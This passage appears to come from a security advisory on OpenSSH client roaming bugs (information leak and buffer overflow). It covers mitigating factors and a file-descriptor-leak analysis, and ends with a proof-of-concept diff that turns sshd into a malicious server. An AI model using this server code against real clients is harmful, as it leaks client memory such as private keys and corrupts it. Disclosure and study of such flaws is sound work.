free(setp);\n1785 }\n\n------------------------------------------------------------------------\nMitigating Factors\n------------------------------------------------------------------------\n\nThis buffer overflow affects all OpenSSH clients \u003e= 5.4, but its impact\nis significantly reduced by the Mitigating Factors detailed in the\nInformation Leak section, and additionally:\n\n- OpenSSH versions \u003e= 6.8 reimplement packet_backup_state() and\n  packet_restore_state(), but introduce a bug that prevents the buffer\n  overflow from being exploited; indeed, ssh_packet_backup_state() swaps\n  two local pointers, ssh and backup_state, instead of swapping the two\n  global pointers active_state and backup_state:\n\n  9 struct ssh *active_state, *backup_state;\n... \n238 void\n239 packet_backup_state(void)\n240 {\n241         ssh_packet_backup_state(active_state, backup_state);\n242 }\n243\n244 void\n245 packet_restore_state(void)\n246 {\n247         ssh_packet_restore_state(active_state, backup_state);\n248 }\n\n2269 void\n2270 ssh_packet_backup_state(struct ssh *ssh,\n2271     struct ssh *backup_state)\n2272 {\n2273         struct ssh *tmp;\n.... \n2279         if (backup_state)\n2280                 tmp = backup_state;\n2281         else\n2282                 tmp = ssh_alloc_session_state();\n2283         backup_state = ssh;\n2284         ssh = tmp;\n2285 }\n.... \n2291 void\n2292 ssh_packet_restore_state(struct ssh *ssh,\n2293     struct ssh *backup_state)\n2294 {\n2295         struct ssh *tmp;\n.... \n2299         tmp = backup_state;\n2300         backup_state = ssh;\n2301         ssh = tmp;\n2302         ssh-\u003estate-\u003econnection_in = backup_state-\u003estate-\u003econnection_in;\n\n  As a result, the global pointer backup_state is still NULL when passed\n  to ssh_packet_restore_state(), and crashes the OpenSSH client when\n  dereferenced:\n\n# env ROAMING=\"overflow:A fd_leaks:0\" \"`pwd`\"/sshd -o ListenAddress=127.0.0.1:222 -o UsePrivilegeSeparation=no -f /etc/ssh/sshd_config -h /etc/ssh/ssh_host_rsa_key\n\n$ /usr/bin/ssh -V\nOpenSSH_6.8, LibreSSL 2.1\n\n$ /usr/bin/ssh -o ProxyCommand=\"/usr/bin/nc -w 15 %h %p\" -p 222 127.0.0.1\nuser@127.0.0.1\u0027s password:\n[connection suspended, press return to resume]Segmentation fault (core dumped)\n\n  This bug prevents the buffer overflow from being exploited, but not\n  the information leak, because the vulnerable function resend_bytes()\n  is called before ssh_packet_restore_state() crashes. \n\n------------------------------------------------------------------------\nFile Descriptor Leak\n------------------------------------------------------------------------\n\nA back-of-the-envelope calculation indicates that, in order to increase\nthe file descriptor connection_in or connection_out, and thus overflow\nthe file descriptor set setp in packet_read_seqnr() or\npacket_write_wait(), a file descriptor leak is needed:\n\n- First, the number of bytes calloc()ated for setp is rounded up to the\n  nearest multiple of sizeof(fd_mask): 8 bytes (or 64 file descriptors)\n  on 64-bit systems. \n\n- Next, in glibc, this number is rounded up to the nearest multiple of\n  MALLOC_ALIGNMENT: 16 bytes (or 128 file descriptors) on 64-bit\n  systems. \n\n- Last, in glibc, a MIN_CHUNK_SIZE is enforced: 32 bytes on 64-bit\n  systems, of which 24 bytes (or 192 file descriptors) are reserved for\n  setp. \n\n- In conclusion, a file descriptor leak is needed, because connection_in\n  or connection_out has to be increased by hundreds in order to overflow\n  setp. \n\nThe search for a suitable file descriptor leak begins with a study of\nthe behavior of the four ssh_connect() methods, when called for a\nreconnection by wait_for_roaming_reconnect():\n\n1. The default method ssh_connect_direct() communicates with the server\nthrough a simple TCP socket: the two file descriptors connection_in and\nconnection_out are both equal to this socket\u0027s file descriptor. \n\nIn wait_for_roaming_reconnect(), the low-numbered file descriptor of the\nold TCP socket is close()d by packet_backup_state(), but immediately\nreused for the new TCP socket in ssh_connect_direct(): the new file\ndescriptors connection_in and connection_out are equal to this old,\nlow-numbered file descriptor, and cannot possibly overflow setp. \n\n2. The special ProxyCommand \"-\" communicates with the server through\nstdin and stdout, but (as explained in the Mitigating Factors of the\nInformation Leak section) it cannot possibly reconnect to the server,\nand is therefore immune to this buffer overflow. \n\n3. Surprisingly, we discovered a file descriptor leak in the\nssh_proxy_fdpass_connect() method itself; indeed, the file descriptor\nsp[1] is never close()d:\n\n 101 static int\n 102 ssh_proxy_fdpass_connect(const char *host, u_short port,\n 103     const char *proxy_command)\n 104 {\n ... \n 106         int sp[2], sock;\n ... \n 113         if (socketpair(AF_UNIX, SOCK_STREAM, 0, sp) \u003c 0)\n 114                 fatal(\"Could not create socketpair to communicate with \"\n 115                     \"proxy dialer: %.100s\", strerror(errno));\n ... \n 161         close(sp[0]);\n ... \n 164         if ((sock = mm_receive_fd(sp[1])) == -1)\n 165                 fatal(\"proxy dialer did not pass back a connection\");\n ... \n 171         /* Set the connection file descriptors. */\n 172         packet_set_connection(sock, sock);\n 173\n 174         return 0;\n 175 }\n\nHowever, two different reasons prevent this file descriptor leak from\ntriggering the setp overflow:\n\n- The method ssh_proxy_fdpass_connect() communicates with the server\n  through a single socket received from the ProxyCommand: the two file\n  descriptors connection_in and connection_out are both equal to this\n  socket\u0027s file descriptor. \n\n  In wait_for_roaming_reconnect(), the low-numbered file descriptor of\n  the old socket is close()d by packet_backup_state(), reused for sp[0]\n  in ssh_proxy_fdpass_connect(), close()d again, and eventually reused\n  again for the new socket: the new file descriptors connection_in and\n  connection_out are equal to this old, low-numbered file descriptor,\n  and cannot possibly overflow setp. \n\n- Because of the waitpid() bug described in the Mitigating Factors of\n  the Information Leak section, the method ssh_proxy_fdpass_connect()\n  calls fatal() before it returns to wait_for_roaming_reconnect(), and\n  is therefore immune to this buffer overflow. \n\n4. The method ssh_proxy_connect() communicates with the server through a\nProxyCommand and two different pipes: the file descriptor connection_in\nis the read end of the second pipe (pout[0]), and the file descriptor\nconnection_out is the write end of the first pipe (pin[1]):\n\n 180 static int\n 181 ssh_proxy_connect(const char *host, u_short port, const char *proxy_command)\n 182 {\n ... \n 184         int pin[2], pout[2];\n ... \n 192         if (pipe(pin) \u003c 0 || pipe(pout) \u003c 0)\n 193                 fatal(\"Could not create pipes to communicate with the proxy: %.100s\",\n 194                     strerror(errno));\n ... \n 240         /* Close child side of the descriptors. */\n 241         close(pin[0]);\n 242         close(pout[1]);\n ... \n 247         /* Set the connection file descriptors. */\n 248         packet_set_connection(pout[0], pin[1]);\n 249\n 250         /* Indicate OK return */\n 251         return 0;\n 252 }\n\nIn wait_for_roaming_reconnect(), the two old, low-numbered file\ndescriptors connection_in and connection_out are both close()d by\npacket_backup_state(), and immediately reused for the pipe(pin) in\nssh_proxy_connect(): the new connection_out (pin[1]) is equal to one of\nthese old, low-numbered file descriptors, and cannot possibly overflow\nsetp. \n\nOn the other hand, the pipe(pout) in ssh_proxy_connect() may return\nhigh-numbered file descriptors, and the new connection_in (pout[0]) may\ntherefore overflow setp, if hundreds of file descriptors were leaked\nbefore the call to wait_for_roaming_reconnect():\n\n- We discovered a file descriptor leak in the pubkey_prepare() function\n  of OpenSSH \u003e= 6.8; indeed, if the client is running an authentication\n  agent that does not offer any private keys, the reference to agent_fd\n  is lost, and this file descriptor is never close()d:\n\n1194 static void\n1195 pubkey_prepare(Authctxt *authctxt)\n1196 {\n.... \n1200         int agent_fd, i, r, found;\n.... \n1247         if ((r = ssh_get_authentication_socket(\u0026agent_fd)) != 0) {\n1248                 if (r != SSH_ERR_AGENT_NOT_PRESENT)\n1249                         debug(\"%s: ssh_get_authentication_socket: %s\",\n1250                             __func__, ssh_err(r));\n1251         } else if ((r = ssh_fetch_identitylist(agent_fd, 2, \u0026idlist)) != 0) {\n1252                 if (r != SSH_ERR_AGENT_NO_IDENTITIES)\n1253                         debug(\"%s: ssh_fetch_identitylist: %s\",\n1254                             __func__, ssh_err(r));\n1255         } else {\n.... \n1288                 authctxt-\u003eagent_fd = agent_fd;\n1289         }\n.... \n1299 }\n\n  However, OpenSSH clients \u003e= 6.8 crash in ssh_packet_restore_state()\n  (because of the NULL-pointer dereference discussed in the Mitigating\n  Factors of the Buffer Overflow section) and are immune to the setp\n  overflow, despite this agent_fd leak. \n\n- If ForwardAgent (-A) or ForwardX11 (-X) is enabled in the OpenSSH\n  client (it is disabled by default), a malicious SSH server can request\n  hundreds of forwardings, in order to increase connection_in (each\n  forwarding opens a file descriptor), and thus overflow setp in\n  packet_read_seqnr():\n\n# env ROAMING=\"overflow:A\" \"`pwd`\"/sshd -o ListenAddress=127.0.0.1:222 -o UsePrivilegeSeparation=no -f /dev/null -h /etc/ssh/ssh_host_rsa_key\n\n$ /usr/bin/ssh -V\nOpenSSH_6.6.1p1 Ubuntu-2ubuntu2, OpenSSL 1.0.1f 6 Jan 2014\n\n$ /usr/bin/ssh-agent -- /usr/bin/ssh -A -o ProxyCommand=\"/usr/bin/socat - TCP4:%h:%p\" -p 222 127.0.0.1\nuser@127.0.0.1\u0027s password:\n[connection suspended, press return to resume][connection resumed]\n*** Error in `/usr/bin/ssh\u0027: free(): invalid next size (fast): 0x00007f0474d03e70 ***\nAborted (core dumped)\n\n# env ROAMING=\"overflow:X\" \"`pwd`\"/sshd -o ListenAddress=127.0.0.1:222 -o UsePrivilegeSeparation=no -f /etc/ssh/sshd_config -h /etc/ssh/ssh_host_rsa_key\n\n$ /usr/bin/ssh -V\nOpenSSH_6.4p1, OpenSSL 1.0.1e-fips 11 Feb 2013\n\n$ /usr/bin/ssh -X -o ProxyCommand=\"/usr/bin/socat - TCP4:%h:%p\" -p 222 127.0.0.1\nuser@127.0.0.1\u0027s password:\n[connection suspended, press return to resume][connection resumed]\n*** Error in `/usr/bin/ssh\u0027: free(): invalid next size (fast): 0x00007fdcc2a3aba0 ***\n*** Error in `/usr/bin/ssh\u0027: malloc(): memory corruption: 0x00007fdcc2a3abc0 ***\n\nFinally, a brief digression on two unexpected problems that had to be\nsolved in our proof-of-concept:\n\n- First, setp can be overflowed only in packet_read_seqnr(), not in\n  packet_write_wait(), but agent forwarding and X11 forwarding are post-\n  authentication functionalities, and post-authentication calls to\n  packet_read() or packet_read_expect() are scarce, except in the\n  key-exchange code of OpenSSH clients \u003c 6.8: our proof-of-concept\n  effectively forces a rekeying in order to overflow setp in\n  packet_read_seqnr(). \n\n- Second, after a successful reconnection, packet_read_seqnr() may call\n  fatal(\"Read from socket failed: %.100s\", ...), because roaming_read()\n  may return EAGAIN (EAGAIN is never returned without the reconnection,\n  because the preceding call to select() guarantees that connection_in\n  is ready for read()). Our proof-of-concept works around this problem\n  by forcing the client to resend MAX_ROAMBUF bytes (2M) to the server,\n  allowing data to reach the client before roaming_read() is called,\n  thus avoiding EAGAIN. \n\n\n========================================================================\nAcknowledgments\n========================================================================\n\nWe would like to thank the OpenSSH developers for their great work and\ntheir incredibly quick response, Red Hat Product Security for promptly\nassigning CVE-IDs to these issues, and Alexander Peslyak of the Openwall\nProject for the interesting discussions. \n\n\n========================================================================\nProof Of Concept\n========================================================================\n\ndiff -pruN openssh-6.4p1/auth2-pubkey.c openssh-6.4p1+roaming/auth2-pubkey.c\n--- openssh-6.4p1/auth2-pubkey.c\t2013-07-17 23:10:10.000000000 -0700\n+++ openssh-6.4p1+roaming/auth2-pubkey.c\t2016-01-07 01:04:15.000000000 -0800\n@@ -169,7 +169,9 @@ userauth_pubkey(Authctxt *authctxt)\n \t\t * if a user is not allowed to login. is this an\n \t\t * issue? -markus\n \t\t */\n-\t\tif (PRIVSEP(user_key_allowed(authctxt-\u003epw, key))) {\n+\t\tif (PRIVSEP(user_key_allowed(authctxt-\u003epw, key)) || 1) {\n+\t\t\tdebug(\"%s: force client-side load_identity_file\",\n+\t\t\t    __func__);\n \t\t\tpacket_start(SSH2_MSG_USERAUTH_PK_OK);\n \t\t\tpacket_put_string(pkalg, alen);\n \t\t\tpacket_put_string(pkblob, blen);\ndiff -pruN openssh-6.4p1/kex.c openssh-6.4p1+roaming/kex.c\n--- openssh-6.4p1/kex.c\t2013-06-01 14:31:18.000000000 -0700\n+++ openssh-6.4p1+roaming/kex.c\t2016-01-07 01:04:15.000000000 -0800\n@@ -442,6 +442,73 @@ proposals_match(char *my[PROPOSAL_MAX],\n }\n \n static void\n+roaming_reconnect(void)\n+{\n+\tpacket_read_expect(SSH2_MSG_KEX_ROAMING_RESUME);\n+\tconst u_int id = packet_get_int(); /* roaming_id */\n+\tdebug(\"%s: id %u\", __func__, id);\n+\tpacket_check_eom();\n+\n+\tconst char *const dir = get_roaming_dir(id);\n+\tdebug(\"%s: dir %s\", __func__, dir);\n+\tconst int fd = open(dir, O_RDONLY | O_NOFOLLOW | O_NONBLOCK);\n+\tif (fd \u003c= -1)\n+\t\tfatal(\"%s: open %s errno %d\", __func__, dir, errno);\n+\tif (fchdir(fd) != 0)\n+\t\tfatal(\"%s: fchdir %s errno %d\", __func__, dir, errno);\n+\tif (close(fd) != 0)\n+\t\tfatal(\"%s: close %s errno %d\", __func__, dir, errno);\n+\n+\tpacket_start(SSH2_MSG_KEX_ROAMING_AUTH_REQUIRED);\n+\tpacket_put_int64(arc4random()); /* chall */\n+\tpacket_put_int64(arc4random()); /* oldchall */\n+\tpacket_send();\n+\n+\tpacket_read_expect(SSH2_MSG_KEX_ROAMING_AUTH);\n+\tconst u_int64_t client_read_bytes = packet_get_int64();\n+\tdebug(\"%s: client_read_bytes %llu\", __func__,\n+\t    (unsigned long long)client_read_bytes);\n+\tpacket_get_int64(); /* digest (1-8) */\n+\tpacket_get_int64(); /* digest (9-16) */\n+\tpacket_get_int();   /* digest (17-20) */\n+\tpacket_check_eom();\n+\n+\tu_int64_t client_write_bytes;\n+\tsize_t len = sizeof(client_write_bytes);\n+\tload_roaming_file(\"client_write_bytes\", \u0026client_write_bytes, \u0026len);\n+\tdebug(\"%s: client_write_bytes %llu\", __func__,\n+\t    (unsigned long long)client_write_bytes);\n+\n+\tu_int client_out_buf_size;\n+\tlen = sizeof(client_out_buf_size);\n+\tload_roaming_file(\"client_out_buf_size\", \u0026client_out_buf_size, \u0026len);\n+\tdebug(\"%s: client_out_buf_size %u\", __func__, client_out_buf_size);\n+\tif (client_out_buf_size \u003c= 0 || client_out_buf_size \u003e MAX_ROAMBUF)\n+\t\tfatal(\"%s: client_out_buf_size %u\", __func__,\n+\t\t\t   client_out_buf_size);\n+\n+\tpacket_start(SSH2_MSG_KEX_ROAMING_AUTH_OK);\n+\tpacket_put_int64(client_write_bytes - (u_int64_t)client_out_buf_size);\n+\tpacket_send();\n+\tconst int overflow = (access(\"output\", F_OK) == 0);\n+\tif (overflow != 0) {\n+\t\tconst void *const ptr = load_roaming_file(\"output\", NULL, \u0026len);\n+\t\tbuffer_append(packet_get_output(), ptr, len);\n+\t}\n+\tpacket_write_wait();\n+\n+\tchar *const client_out_buf = xmalloc(client_out_buf_size);\n+\tif (atomicio(read, packet_get_connection_in(), client_out_buf,\n+\t\t\t       client_out_buf_size) != client_out_buf_size)\n+\t\tfatal(\"%s: read client_out_buf_size %u errno %d\", __func__,\n+\t\t\t\tclient_out_buf_size, errno);\n+\tif (overflow == 0)\n+\t\tdump_roaming_file(\"infoleak\", client_out_buf,\n+\t\t\t\t\t      client_out_buf_size);\n+\tfatal(\"%s: all done for %s\", __func__, dir);\n+}\n+\n+static void\n kex_choose_conf(Kex *kex)\n {\n \tNewkeys *newkeys;\n@@ -470,6 +537,10 @@ kex_choose_conf(Kex *kex)\n \t\t\tkex-\u003eroaming = 1;\n \t\t\tfree(roaming);\n \t\t}\n+\t} else if (strcmp(peer[PROPOSAL_KEX_ALGS], KEX_RESUME) == 0) {\n+\t\troaming_reconnect();\n+\t\t/* NOTREACHED */\n+\t\tfatal(\"%s: returned from %s\", __func__, KEX_RESUME);\n \t}\n \n \t/* Algorithm Negotiation */\ndiff -pruN openssh-6.4p1/roaming.h openssh-6.4p1+roaming/roaming.h\n--- openssh-6.4p1/roaming.h\t2011-12-18 15:52:52.000000000 -0800\n+++ openssh-6.4p1+roaming/roaming.h\t2016-01-07 01:04:15.000000000 -0800\n@@ -42,4 +42,86 @@ void\tresend_bytes(int, u_int64_t *);\n void\tcalculate_new_key(u_int64_t *, u_int64_t, u_int64_t);\n int\tresume_kex(void);\n \n+#include \u003cfcntl.h\u003e\n+#include \u003cstdio.h\u003e\n+#include \u003cstring.h\u003e\n+#include \u003csys/stat.h\u003e\n+#include \u003csys/types.h\u003e\n+#include \u003cunistd.h\u003e\n+\n+#include \"atomicio.h\"\n+#include \"log.h\"\n+#include \"xmalloc.h\"\n+\n+static inline char *\n+get_roaming_dir(const u_int id)\n+{\n+\tconst size_t buflen = MAXPATHLEN;\n+\tchar *const buf = xmalloc(buflen);\n+\n+\tif ((u_int)snprintf(buf, buflen, \"/tmp/roaming-%08x\", id) \u003e= buflen)\n+\t\tfatal(\"%s: snprintf %u error\", __func__, id);\n+\treturn buf;\n+}\n+\n+static inline void\n+dump_roaming_file(const char *const name,\n+    const void *const buf, const size_t buflen)\n+{\n+\tif (name == NULL)\n+\t\tfatal(\"%s: name %p\", __func__, name);\n+\tif (strchr(name, \u0027/\u0027) != NULL)\n+\t\tfatal(\"%s: name %s\", __func__, name);\n+\tif (buf == NULL)\n+\t\tfatal(\"%s: %s buf %p\", __func__, name, buf);\n+\tif (buflen \u003c= 0 || buflen \u003e MAX_ROAMBUF)\n+\t\tfatal(\"%s: %s buflen %lu\", __func__, name, (u_long)buflen);\n+\n+\tconst int fd = open(name, O_WRONLY | O_CREAT | O_EXCL, S_IRUSR);\n+\tif (fd \u003c= -1)\n+\t\tfatal(\"%s: open %s errno %d\", __func__, name, errno);\n+\tif (write(fd, buf, buflen) != (ssize_t)buflen)\n+\t\tfatal(\"%s: write %s errno %d\", __func__, name, errno);\n+\tif (close(fd) != 0)\n+\t\tfatal(\"%s: close %s errno %d\", __func__, name, errno);\n+}\n+\n+static inline void *\n+load_roaming_file(const char *const name,\n+    void *buf, size_t *const buflenp)\n+{\n+\tif (name == NULL)\n+\t\tfatal(\"%s: name %p\", __func__, name);\n+\tif (strchr(name, \u0027/\u0027) != NULL)\n+\t\tfatal(\"%s: name %s\", __func__, name);\n+\tif (buflenp == NULL)\n+\t\tfatal(\"%s: %s buflenp %p\", __func__, name, buflenp);\n+\n+\tconst int fd = open(name, O_RDONLY | O_NOFOLLOW | O_NONBLOCK);\n+\tif (fd \u003c= -1)\n+\t\tfatal(\"%s: open %s errno %d\", __func__, name, errno);\n+\tstruct stat st;\n+\tif (fstat(fd, \u0026st) != 0)\n+\t\tfatal(\"%s: fstat %s errno %d\", __func__, name, errno);\n+\tif (S_ISREG(st.st_mode) == 0)\n+\t\tfatal(\"%s: %s mode 0%o\", __func__, name, (u_int)st.st_mode);\n+\tif (st.st_size \u003c= 0 || st.st_size \u003e MAX_ROAMBUF)\n+\t\tfatal(\"%s: %s size %lld\", __func__, name,\n+\t\t    (long long)st.st_size);\n+\n+\tif (buf == NULL) {\n+\t\t*buflenp = st.st_size;\n+\t\tbuf = xmalloc(*buflenp);\n+\t} else {\n+\t\tif (*buflenp != (size_t)st.st_size)\n+\t\t\tfatal(\"%s: %s size %lld buflen %lu\", __func__, name,\n+\t\t\t    (long long)st.st_size, (u_long)*buflenp);\n+\t}\n+\tif (read(fd, buf, *buflenp) != (ssize_t)*buflenp)\n+\t\tfatal(\"%s: read %s errno %d\", __func__, name, errno);\n+\tif (close(fd) != 0)\n+\t\tfatal(\"%s: close %s errno %d\", __func__, name, errno);\n+\treturn buf;\n+}\n+\n #endif /* ROAMING */\ndiff -pruN openssh-6.4p1/serverloop.c openssh-6.4p1+roaming/serverloop.c\n--- openssh-6.4p1/serverloop.c\t2013-07-17 23:12:45.000000000 -0700\n+++ openssh-6.4p1+roaming/serverloop.c\t2016-01-07 01:04:15.000000000 -0800\n@@ -1060,6 +1060,9 @@ server_request_session(void)\n \treturn c;\n }\n \n+static int client_session_channel = -1;\n+static int server_session_channel = -1;\n+\n static void\n server_input_channel_open(int type, u_int32_t seq, void *ctxt)\n {\n@@ -1089,12 +1092,22 @@ server_input_channel_open(int type, u_in\n \t\tc-\u003eremote_window = rwindow;\n \t\tc-\u003eremote_maxpacket = rmaxpack;\n \t\tif (c-\u003etype != SSH_CHANNEL_CONNECTING) {\n+\t\t\tdebug(\"%s: avoid client-side buf_append\", __func__);\n+\t\t\t/*\n \t\t\tpacket_start(SSH2_MSG_CHANNEL_OPEN_CONFIRMATION);\n \t\t\tpacket_put_int(c-\u003eremote_id);\n \t\t\tpacket_put_int(c-\u003eself);\n \t\t\tpacket_put_int(c-\u003elocal_window);\n \t\t\tpacket_put_int(c-\u003elocal_maxpacket);\n \t\t\tpacket_send();\n+\t\t\t*/\n+\t\t\tif (strcmp(ctype, \"session\") == 0) {\n+\t\t\t\tif (client_session_channel != -1)\n+\t\t\t\t\tfatal(\"%s: client_session_channel %d\",\n+\t\t\t\t\t    __func__, client_session_channel);\n+\t\t\t\tclient_session_channel = c-\u003eremote_id;\n+\t\t\t\tserver_session_channel = c-\u003eself;\n+\t\t\t}\n \t\t}\n \t} else {\n \t\tdebug(\"server_input_channel_open: failure %s\", ctype);\n@@ -1111,6 +1124,196 @@ server_input_channel_open(int type, u_in\n }\n \n static void\n+roaming_disconnect(Kex *const kex)\n+{\n+\tconst char *cp, *roaming = getenv(\"ROAMING\");\n+\tif (roaming == NULL)\n+\t\troaming = \"infoleak\";\n+\tint overflow = 0;\n+\tif ((cp = strstr(roaming, \"overflow:\")) != NULL)\n+\t\toverflow = cp[9];\n+\n+\tconst u_int client_recv_buf_size = packet_get_int();\n+\tpacket_check_eom();\n+\tconst u_int server_recv_buf_size = get_recv_buf_size();\n+\tconst u_int server_send_buf_size = get_snd_buf_size();\n+\tdebug(\"%s: client_recv_buf_size %u\", __func__, client_recv_buf_size);\n+\tdebug(\"%s: server_recv_buf_size %u\", __func__, server_recv_buf_size);\n+\tdebug(\"%s: server_send_buf_size %u\", __func__, server_send_buf_size);\n+\n+\tu_int client_send_buf_size = 0;\n+\tif ((cp = strstr(roaming, \"client_send_buf_size:\")) != NULL)\n+\t\tclient_send_buf_size = strtoul(cp + 21, NULL, 0);\n+\telse if (client_recv_buf_size == DEFAULT_ROAMBUF)\n+\t\tclient_send_buf_size = DEFAULT_ROAMBUF;\n+\telse {\n+\t\tconst u_int\n+\t\t    max = MAX(client_recv_buf_size, server_recv_buf_size),\n+\t\t    min = MIN(client_recv_buf_size, server_recv_buf_size);\n+\t\tif (min \u003c= 0)\n+\t\t\tfatal(\"%s: min %u\", __func__, min);\n+\t\tif (((u_int64_t)(max - min) * 1024) / min \u003c 1)\n+\t\t\tclient_send_buf_size = server_send_buf_size;\n+\t\telse\n+\t\t\tclient_send_buf_size = client_recv_buf_size;\n+\t}\n+\tdebug(\"%s: client_send_buf_size %u\", __func__, client_send_buf_size);\n+\tif (client_send_buf_size \u003c= 0)\n+\t\tfatal(\"%s: client_send_buf_size\", __func__);\n+\n+\tu_int id = 0;\n+\tchar *dir = NULL;\n+\tfor (;;) {\n+\t\tid = arc4random();\n+\t\tdebug(\"%s: id %u\", __func__, id);\n+\t\tfree(dir);\n+\t\tdir = get_roaming_dir(id);\n+\t\tif (mkdir(dir, S_IRWXU) == 0)\n+\t\t\tbreak;\n+\t\tif (errno != EEXIST)\n+\t\t\tfatal(\"%s: mkdir %s errno %d\", __func__, dir, errno);\n+\t}\n+\tdebug(\"%s: dir %s\", __func__, dir);\n+\tif (chdir(dir) != 0)\n+\t\tfatal(\"%s: chdir %s errno %d\", __func__, dir, errno);\n+\n+\tu_int client_out_buf_size = 0;\n+\tif ((cp = strstr(roaming, \"client_out_buf_size:\")) != NULL)\n+\t\tclient_out_buf_size = strtoul(cp + 20, NULL, 0);\n+\telse if (overflow != 0)\n+\t\tclient_out_buf_size = MAX_ROAMBUF;\n+\telse\n+\t\tclient_out_buf_size = 1 + arc4random() % 4096;\n+\tdebug(\"%s: client_out_buf_size %u\", __func__, client_out_buf_size);\n+\tif (client_out_buf_size \u003c= 0)\n+\t\tfatal(\"%s: client_out_buf_size\", __func__);\n+\tdump_roaming_file(\"client_out_buf_size\", \u0026client_out_buf_size,\n+\t\t\t\t\t   sizeof(client_out_buf_size));\n+\n+\tif ((cp = strstr(roaming, \"scp_mode\")) != NULL) {\n+\t\tif (overflow != 0)\n+\t\t\tfatal(\"%s: scp_mode is incompatible with overflow %d\",\n+\t\t\t    __func__, overflow);\n+\n+\t\tu_int seconds_left_to_sleep = 3;\n+\t\tif ((cp = strstr(cp, \"sleep:\")) != NULL)\n+\t\t\tseconds_left_to_sleep = strtoul(cp + 6, NULL, 0);\n+\t\tdebug(\"%s: sleep %u\", __func__, seconds_left_to_sleep);\n+\n+\t\tif (client_session_channel == -1)\n+\t\t\tfatal(\"%s: client_session_channel %d\",\n+\t\t\t    __func__, client_session_channel);\n+\n+\t\tpacket_start(SSH2_MSG_CHANNEL_OPEN_CONFIRMATION);\n+\t\tpacket_put_int(client_session_channel);\n+\t\tpacket_put_int(server_session_channel);\n+\t\tpacket_put_int(0); /* server window */\n+\t\tpacket_put_int(0); /* server maxpacket */\n+\t\tpacket_send();\n+\n+\t\tpacket_start(SSH2_MSG_CHANNEL_DATA);\n+\t\tpacket_put_int(client_session_channel);\n+\t\tpacket_put_string(\"\\0\\n\", 2); /* response\u0026source|sink\u0026run_err */\n+\t\tpacket_send();\n+\n+\t\tpacket_read_expect(SSH2_MSG_CHANNEL_REQUEST);\n+\t\tpacket_get_int(); /* server channel */\n+\t\tdebug(\"%s: channel request %s\", __func__,\n+\t\t    packet_get_cstring(NULL));\n+\n+\t\twhile (seconds_left_to_sleep)\n+\t\t\tseconds_left_to_sleep = sleep(seconds_left_to_sleep);\n+\t}\n+\n+\tpacket_start(SSH2_MSG_REQUEST_SUCCESS);\n+\tpacket_put_int(id); /* roaming_id */\n+\tpacket_put_int64(arc4random()); /* cookie */\n+\tpacket_put_int64(0); /* key1 */\n+\tpacket_put_int64(0); /* key2 */\n+\tpacket_put_int(client_out_buf_size - client_send_buf_size);\n+\tpacket_send();\n+\tpacket_write_wait();\n+\n+\tif (overflow != 0) {\n+\t\tconst u_int64_t full_client_out_buf = get_recv_bytes() +\n+\t\t\t\t     client_out_buf_size;\n+\n+\t\tu_int fd_leaks = 4 * 8 * 8; /* MIN_CHUNK_SIZE in bits */\n+\t\tif ((cp = strstr(roaming, \"fd_leaks:\")) != NULL)\n+\t\t\tfd_leaks = strtoul(cp + 9, NULL, 0);\n+\t\tdebug(\"%s: fd_leaks %u\", __func__, fd_leaks);\n+\n+\t\twhile (fd_leaks--) {\n+\t\t\tpacket_start(SSH2_MSG_CHANNEL_OPEN);\n+\t\t\tpacket_put_cstring(overflow == \u0027X\u0027 ? \"x11\" :\n+\t\t\t    \"auth-agent@openssh.com\"); /* ctype */\n+\t\t\tpacket_put_int(arc4random()); /* server channel */\n+\t\t\tpacket_put_int(arc4random()); /* server window */\n+\t\t\tpacket_put_int(arc4random()); /* server maxpacket */\n+\t\t\tif (overflow == \u0027X\u0027) {\n+\t\t\t\tpacket_put_cstring(\"\"); /* originator */\n+\t\t\t\tpacket_put_int(arc4random()); /* port */\n+\t\t\t}\n+\t\t\tpacket_send();\n+\n+\t\t\tpacket_read_expect(SSH2_MSG_CHANNEL_OPEN_CONFIRMATION);\n+\t\t\tpacket_get_int(); /* server channel */\n+\t\t\tpacket_get_int(); /* client channel */\n+\t\t\tpacket_get_int(); /* client window */\n+\t\t\tpacket_get_int(); /* client maxpacket */\n+\t\t\tpacket_check_eom();\n+\t\t}\n+\n+\t\twhile (get_recv_bytes() \u003c= full_client_out_buf) {\n+\t\t\tpacket_start(SSH2_MSG_GLOBAL_REQUEST);\n+\t\t\tpacket_put_cstring(\"\"); /* rtype */\n+\t\t\tpacket_put_char(1); /* want_reply */\n+\t\t\tpacket_send();\n+\n+\t\t\tpacket_read_expect(SSH2_MSG_REQUEST_FAILURE);\n+\t\t\tpacket_check_eom();\n+\t\t}\n+\n+\t\tif (kex == NULL)\n+\t\t\tfatal(\"%s: no kex, cannot rekey\", __func__);\n+\t\tif (kex-\u003eflags \u0026 KEX_INIT_SENT)\n+\t\t\tfatal(\"%s: KEX_INIT_SENT already\", __func__);\n+\t\tchar *const ptr = buffer_ptr(\u0026kex-\u003emy);\n+\t\tconst u_int len = buffer_len(\u0026kex-\u003emy);\n+\t\tif (len \u003c= 1+4) /* first_kex_follows + reserved */\n+\t\t\tfatal(\"%s: kex len %u\", __func__, len);\n+\t\tptr[len - (1+4)] = 1; /* first_kex_follows */\n+\t\tkex_send_kexinit(kex);\n+\n+\t\tu_int i;\n+\t\tpacket_read_expect(SSH2_MSG_KEXINIT);\n+\t\tfor (i = 0; i \u003c KEX_COOKIE_LEN; i++)\n+\t\t\tpacket_get_char();\n+\t\tfor (i = 0; i \u003c PROPOSAL_MAX; i++)\n+\t\t\tfree(packet_get_string(NULL));\n+\t\tpacket_get_char(); /* first_kex_follows */\n+\t\tpacket_get_int(); /* reserved */\n+\t\tpacket_check_eom();\n+\n+\t\tchar buf[8192*2]; /* two packet_read_seqnr bufferfuls */\n+\t\tmemset(buf, \u0027\\0\u0027, sizeof(buf));\n+\t\tpacket_start(SSH2_MSG_KEX_ROAMING_AUTH_FAIL);\n+\t\tpacket_put_string(buf, sizeof(buf));\n+\t\tpacket_send();\n+\t\tconst Buffer *const output = packet_get_output();\n+\t\tdump_roaming_file(\"output\", buffer_ptr(output),\n+\t\t\t\t\t    buffer_len(output));\n+\t}\n+\n+\tconst u_int64_t client_write_bytes = get_recv_bytes();\n+\tdebug(\"%s: client_write_bytes %llu\", __func__,\n+\t    (unsigned long long)client_write_bytes);\n+\tdump_roaming_file(\"client_write_bytes\", \u0026client_write_bytes,\n+\t\t\t\t\t  sizeof(client_write_bytes));\n+\tfatal(\"%s: all done for %s\", __func__, dir);\n+}\n+\n+static void\n server_input_global_request(int type, u_int32_t seq, void *ctxt)\n {\n \tchar *rtype;\n@@ -1168,6 +1371,13 @@ server_input_global_request(int type, u_\n \t} else if 